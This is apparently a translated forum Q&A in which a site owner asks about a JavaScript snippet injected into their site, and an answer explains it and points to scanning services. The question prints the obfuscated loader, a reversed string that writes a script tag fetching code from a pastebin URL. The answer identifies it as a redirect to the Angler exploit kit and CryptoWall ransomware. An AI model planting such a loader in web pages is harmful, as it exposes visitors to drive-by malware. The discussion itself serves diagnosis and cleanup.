谷歌扫描仪检测到Javascript恶意软件
Javascript Malware Detected by Google Scanner
我最近在我的网站上发现了以下代码
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
这个代码的作用是什么?我是XSS的受害者吗?我的托管公司能做什么吗,比如恶意软件扫描仪等?
这是一个到漏洞利用工具包的重定向代码。。实际URL是
pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js
请从服务器上托管的所有页面中删除此代码。
该文本被反转以形成一个pastebin链接-该pastebin处的脚本被加载并在浏览器中与其余的站点代码一起运行。
您的网站已被入侵并注入恶意javascript代码。
它使用多种重定向/编码方法,但最终会将访问者推到Angler EK(漏洞工具包),然后该工具包会尝试将CryptoWall集中在用户身上。
你可以尝试在这里扫描:
https://sitecheck.sucuri.net
http://www.unmaskparasites.com/
查找有关恶意软件的更多详细信息。
谢谢,
相关文章:
- 在文件中发现此恶意javascript..它做什么
- 恶意软件将代码注入我的Dojo/WebSocket应用程序:如何防止
- 恶意的javascript代码可以通过$()注入吗?
- 为什么在 php 网站中存在恶意软件问题 在 javascript 文件中不断存在
- 对恶意用户隐藏数据 JavaScript 函数
- Javascript恶意软件
- 在 http://vjs.zencdn.net/c/video.js?ver=3.5.1 中发现恶意软件update_f
- 检测恶意软件是否正在篡改网站
- 阻止恶意软件javascript执行
- 谷歌扫描仪检测到Javascript恶意软件
- 解密Javascript恶意软件
- 从网站上删除恶意软件
- 修复:删除fsf.org HomeMader/ActerMoto/lusikrators javascript恶意软件
- 网站上有恶意软件,但它是如何到达那里的
- 过滤恶意软件javascript从Wordpress数据库
- Javascript恶意软件解混淆
- 清理wordpress网站上已知的javascript恶意软件
- 关于删除恶意软件脚本
- 如何使用 JavaScript 比较软件版本号?(只有数字)
- 网站中的恶意软件注入,如何补救